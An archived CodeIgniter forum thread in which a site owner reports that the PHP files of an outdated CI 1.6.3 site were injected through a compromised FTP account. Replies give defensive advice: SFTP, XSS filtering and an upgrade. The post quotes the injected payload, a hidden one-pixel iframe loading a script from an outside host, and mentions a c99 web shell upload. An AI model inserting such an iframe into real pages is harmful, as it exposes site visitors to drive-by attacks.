+- CodeIgniter Forums (https://forum.codeigniter.com)
+-- Forum: Archived Discussions (https://forum.codeigniter.com/forumdisplay.php?fid=20)
+--- Forum: Archived Development & Programming (https://forum.codeigniter.com/forumdisplay.php?fid=23)
+--- Thread: hacked again .. iframe injection CI 1.6.3 !! (/showthread.php?tid=39028)
hacked again .. iframe injection CI 1.6.3 !! - El Forum - 02-27-2011
[eluser]Unknown[/eluser]
Hello everyone. My customer running a website developed in CI version 1.6.3. Recently the website got massive iframe injection.
Code:
<iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=2230488"></iframe>All the php files are injected with, new index.html files are created in each directory. Despite my shouts, developers failed to enable $config['global_xss_filtering'] = false; to true. Could that what have prevented with this situation?
Where should I start to find the root cause where the injection started?
Thanks
hacked again .. iframe injection CI 1.6.3 !! - El Forum - 02-27-2011
[eluser]davidbehler[/eluser]
Hacked ftp access?
hacked again .. iframe injection CI 1.6.3 !! - El Forum - 02-27-2011
[eluser]Unknown[/eluser]
[quote author="waldmeister" date="1298820387"]Hacked ftp access?[/quote]
Yes, it looks like it. Here is the gentleman .. 213.246.45.102. Later on c99 was uploaded and the DB was compromised.
hacked again .. iframe injection CI 1.6.3 !! - El Forum - 02-27-2011
[eluser]Phil Sturgeon[/eluser]
Disable FTP and use SFTP or start SSHing your code online with rsync or Git.
While you're at it, enable XSS protection and upgrade to CodeIgniter 1.7.3 at least (will be an easier jump than going to 2.0).
That should take care of your security concerns.